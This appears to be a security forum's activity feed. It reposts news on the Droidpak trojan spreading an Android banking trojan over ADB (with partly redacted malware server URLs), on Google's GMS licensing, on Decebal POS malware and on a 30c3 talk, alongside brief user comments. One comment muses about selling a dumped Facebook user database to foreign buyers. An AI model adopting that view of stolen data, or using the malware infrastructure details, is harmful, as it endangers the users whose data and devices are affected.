The infection process starts with a trojan, dubbed by security experts Trojan.Droidpak, that drops a malicious DLL and registers it as a system service. Droidpak then downloads a configuration file from the following remote server:

http://xia2.dy[REMOVED]s-web.com/iconfig.txt

The file contains the information needed to download a malicious APK and store it at the following location on the infected PC:

%Windir%\CrainingApkConfig\AV-cdk.apk

The Android malware detected by the analysts seems to be specifically designed for the Korean population, because the malicious APK searches for certain Korean online banking applications on the infected device.

The communication between the mobile device and the compromised PC is realized by a software bridge called Android Debug Bridge (ADB), a command line tool that allows the malicious code to execute commands on an Android smartphone connected to the infected computer. The Android Debug Bridge is a legitimate tool included in the Android software development kit (SDK); when a victim connects an Android device with USB debugging mode enabled, the trojan launches the installation process and infects the smartphone, dropping the Android malware. Once the Android malware has infected the device, it installs an app that will appear as a Google App Store.

Android is the most targeted OS by cyber criminals because of its large diffusion; numerous families of malware were created in 2013 to hit mobile users, and an increasing number of hack tools were available in the underground to hack such a powerful platform. The peculiarity of Trojan.Droidpak is that, for the first time, a Windows malware was used to install a banking trojan on a mobile device.

The banking trojan, dubbed Android.Fakebank.B, implements common features of this category of malware, including SMS interception and “MITM capabilities”. Researchers at Symantec discovered that the Android.Fakebank.B malware sends data back to the following attacker’s server:

http://www.slmoney.co.kr[REMOVED]

The experts provided a few suggestions to protect the user’s system from the Android malware while connecting to a Windows-based computer:

- Turn off USB debugging on your Android device when you are not using it
- Avoid connecting your droid with public computers
- Only install reputable security software
- Keep your system, software and antivirus up to date

Pierluigi Paganini

(Security Affairs – Android Malware, Banking trojan)

Source: https://www.facebook.com/
-
Why Google Android software is not as free or open-source as you may think

Basic Android software may be free, but it doesn’t include the apps that make up Google’s mobile services

Android software is free and open-source, but without Google Play, a device will have minimal functionality. Photograph: Beawiharta/Reuters

Charles Arthur and Samuel Gibbs
Thursday 23 January 2014 16.44 GMT

• This article was amended on 24 January 2014 to reflect a clarification from Google that it does not charge manufacturers for Android licenses.

The idea that Google’s Android mobile software is both “free” and open-source is so often repeated that it is virtually an article of faith online. There’s only one problem: neither is strictly true.

While the basic Android software is indeed available for free, and can be downloaded, compiled and changed by anyone, it doesn’t include the apps that make up Google’s mobile services - such as Maps, Gmail, and crucially Google Play, which allows people to connect to the online store where they can download apps. Without them, a device has only minimal functionality.

To get the key apps, a manufacturer needs a “Google Mobile Services” (GMS) licence. GMS licences are issued on a per-model basis. While Google does not charge a fee for the licence, one of the integral steps in the licence-application process requires payment to authorised Android-testing factories. These factories, which include Foxconn and Archos, charge a fee for carrying out the testing required to obtain a GMS licence, which the Guardian understands is negotiated on a case-by-case, per-manufacturer basis.

Google activates more than 1 million devices with GMS licences every day

The Guardian understands that in one example, testing costs $40,000, payable 50% up front and 50% at the completion of testing for a model with an expected run of at least 30,000 units. The source said Google and its testing partners were being intentionally vague about the fact that a cost is associated with acquisition of a GMS licence, even if the licence itself is free. “It is a lot of money they make, but you can’t see it anywhere because that would tarnish their ‘Android open-source’ karma,” the source said.

However, there’s no definitive price list for the GMS licence process; the authorised testing factories are understood to vary this depending on the number of devices being ordered and the size of the manufacturer or retailer. “Deals are done on an individual basis and are very opaque,” one source in the Android device community, who didn’t want to be identified, told the Guardian. Google didn’t respond to a request for information about GMS pricing, and there is no publicly available list online.

Haphazard and time-consuming

But the process of getting GMS licences appears to be haphazard and time-consuming. “Installing Google Play without a GMS licence is illegal,” the source said. But, they explained, Google “don’t have the internal manpower to police it properly. It’s a volume game. Big OEMs [device manufacturers] pay. Smaller OEMs don’t register in Google’s radar, and they [Google] tend to turn a blind eye. Retailers get pressured by legal OEMs to make sure illegal installs of GMS are weeded out. It’s almost like crowdsourcing.”

That “crowdsourcing” seems to have been KMS Components’ downfall. Argos complained to the Welsh company that the MyTablet which it had provided did not have a GMS licence. This was after Argos had publicly promoted the tablet as excitement about a “tablet Christmas” ramped up following Tesco’s announcement in September that it would sell its Hudl 7in tablet.

Although Google could take out injunctions to prevent retailers selling unlicensed tablets that include GMS, there’s no record of it ever having done so. However, in August 2010 Augen Electronics, the maker of a $150 tablet being sold through the giant American retail chain Kmart, abruptly withdrew it from sale there because it included “unauthorised versions” of the GMS suite.

Compatibility club

Separately, trial documents released from a dispute between Google and Skyhook, a provider of location services, in 2011 revealed internal emails in which Dan Morrill of Google told another staffer that it’s “obvious to the OEMs that we are using [GMS] compatibility as a club to make them do what we want.” Motorola, then an independent company, told Skyhook that Android devices are “approved essentially at Google’s discretion”. Skyhook had wanted Android device makers to use its location service rather than Google’s.

Android compatibility testing is a key precursor step to being awarded a GMS licence. But such testing, and subsequently getting a licence from Google, can be a test in its own right, sources say. One described having to take the matter up with a senior Google vice-president to get the GMS licensing approved. “Smaller OEMs lose out, as they have a hard time getting the GMS licence, and therefore have little alternative but to go without it,” the source said. Yet it is possible to bypass that. End-users can legally install the GMS suite of apps if they know how to.

The idea that Android is “open source” is partially true: the source code for the software is available online, via Google’s servers, and anyone can download it and make changes - as Amazon, for example, has done to create its own version for its Kindle line of tablets. But unlike the vast majority of widely used open-source projects such as Linux, MySQL, PHP or Python, which welcome outside contributors, only people working inside Google can make changes that will become part of the future direction of the software. Device manufacturers who want to get the upcoming version of Android have to wait for it to become available from Google’s servers.

Source: Why Google Android software is not as free or open-source as you may think | Technology | theguardian.com
-
https://www.youtube.com/watch?v=ITR88wT8ekM&desktop_uri=%2Fwatch%3Fv%3DITR88wT8ekM&app=desktop
-
After the SQL injection crowd, this is the new generation of "hackers". This world is going to the dogs.
-
How I found a Remote Code Execution bug affecting Facebook's servers
Nytro replied to malsploit's topic in Security news
Having access to the data of a company worth around 100 billion dollars? It depends how much access you would have, and where. If you dumped the facebook_users table, its value would easily exceed $10 million. If you sold it to China or Russia you would probably get yourself an exotic island and a few thousand virgins. Well, not just the users; there are also private messages, private photos/videos and many other useful things: friend lists, events, visited locations, IP addresses and who knows what other data Facebook keeps.
-
How I found a Remote Code Execution bug affecting Facebook's servers
Nytro replied to malsploit's topic in Security news
Facebook pays well, but think about what, and how much, you could do with a SQL Injection or Remote Code/Command Execution...
-
Wanted nationwide, caught on Facebook by an "attractive woman"
Nytro replied to Fi8sVrs's topic in Security news
It's like the folk saying: "After you shit in the middle of the street, you also get slapped for it".
-
The weird part is this: Adevarul said in their article that in the past this guy worked as a taxi driver.
-
"The most wanted hacker in the world"
-
Five products offered free by Ashampoo – Limited promotion
Nytro posted a topic in Useful programs
Five products offered free by Ashampoo – Limited promotion

By Radu FaraVirusi(com) on January 20, 2014

Ashampoo is offering 5 quality products with a completely free licence: Ashampoo WinOptimizer 2013, Ashampoo Burning Studio 2013, Ashampoo Photo Commander 10, Ashampoo Snap 6 and Ashampoo SlideshowStudio 2013. Enjoy an optimized system, disc creation in any format, and sorting and arranging your favourite photos using the programs listed above.

Use the link below to take advantage of the promotion: Your personal Ashampoo® gift

Source: Cinci produse oferite gratuit de Ashampoo – Promotie limitata
-
30c3 - Mobile Network Attack Evolution

Description: Mobile network attack evolution

Mobile networks should protect users on several fronts: calls need to be encrypted, customer data protected, and SIM cards shielded from malware. Many networks are still reluctant to implement appropriate protection measures in legacy systems. But even those who add mitigations often fail to fully capture attacks: they target symptoms instead of solving the core issue. This talk discusses mobile network and SIM card attacks that circumvent common protection techniques to illustrate the ongoing mobile attack evolution.

The evolution is exemplified by new advanced attack vectors against mobile communication and SIM cards:

- Mobile calls and identities are known to be weakly protected, but networks progressively rolled out patches to defeat hacking tools. We will discuss, and release, tools to measure whether these changes are effective.
- SIM cards were identified as a remote exploitation risk this year: unnoticed by the victim, an attacker can take control over a card by sending a few binary SMS. Network operators started filtering binary SMS and patched some of their weak SIM card configurations in response to vulnerability research. The talk looks at filtering evasion techniques and discloses new configuration vulnerabilities present in many cards world-wide.

For more information please visit: https://events.ccc.de/congress/2013/wiki/Main_Page

Source: 30c3 - Mobile Network Attack Evolution
-
Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript

January 18th, 2014, 09:53 GMT · By Eduard Kovacs

Researchers from IT security firm IntelCrawler have identified a new malware, dubbed “Decebal,” that’s designed to steal information from point-of-sale (POS) systems. The threat has been written in VBScript and the functional code is less than 400 lines.

Malware designed to target POS systems is becoming more and more popular, and the recent attacks aimed against Target, Neiman Marcus, and other US retailers demonstrate it. However, the Decebal malware – whose name stems from Decebalus, the king of Dacia, the historic region that today corresponds to Romania and Moldova – shows that such threats are constantly evolving.

What’s interesting about Decebal is that it’s capable of checking to see if the computer on which it’s deployed is running any sandboxing or reverse engineering software. It’s also designed to validate payment card numbers.

“There was also found Track 2 validation software, used by bad actors to check received compromised data by issuing bank by the first 6 digits (BIN), which has some phrases and text strings in Romanian, pointing on the original roots of possible authors,” IntelCrawler noted in its report.

For instance, when an error occurs in the Track2 data validation process, the message “Esti beat?” is displayed in a pop-up. In Romanian, “Esti beat?” means “Are you drunk?” The strings “Select file” and “Validate” are also written in Romanian.

The Decebal POS malware was first released on January 3, 2014. The threat has a very compact command and control server that acts as a gate for receiving data stolen from POS machines.

“The code is pretty portable, scripting language is great advantage for easy infection to Point-of-Sale and is more flexible than binaries. This example shows that modern retailers environments can face with such threat and bad actors don't need to do lots of efforts for it,” explained Andrew Komarov, CEO of IntelCrawler.

14 hours ago, none of the antivirus engines from VirusTotal detected the threat. The sample was first checked on VirusTotal on January 12, but nothing has changed since then.

Source: Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript
-
From whose PayPal account are you offering? Suggestion: don't do the exchange with him yet, I'm waiting for him to answer my question.